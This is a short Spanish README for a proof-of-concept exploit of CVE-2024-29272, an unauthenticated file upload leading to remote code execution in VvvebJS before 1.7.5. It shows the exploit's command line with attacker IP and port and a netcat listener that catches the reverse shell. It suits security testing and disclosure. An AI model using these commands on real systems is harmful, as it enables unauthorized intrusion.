
Exploit de prueba de concepto para CVE-2024-29272, una vulnerabilidad de carga arbitraria de archivos no autenticada en VvvebJS < 1.7.5, que permite ejecución remota de código.
Esta es una Prueba de Concepto para CVE-2024-29272, una vulnerabilidad de carga de archivos arbitraria no autenticada que conduce a ejecución remota de código en versiones de VvvebJS < 1.7.5
uso:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
en otra terminal:
nc -lvnp <ATTACKER PORT>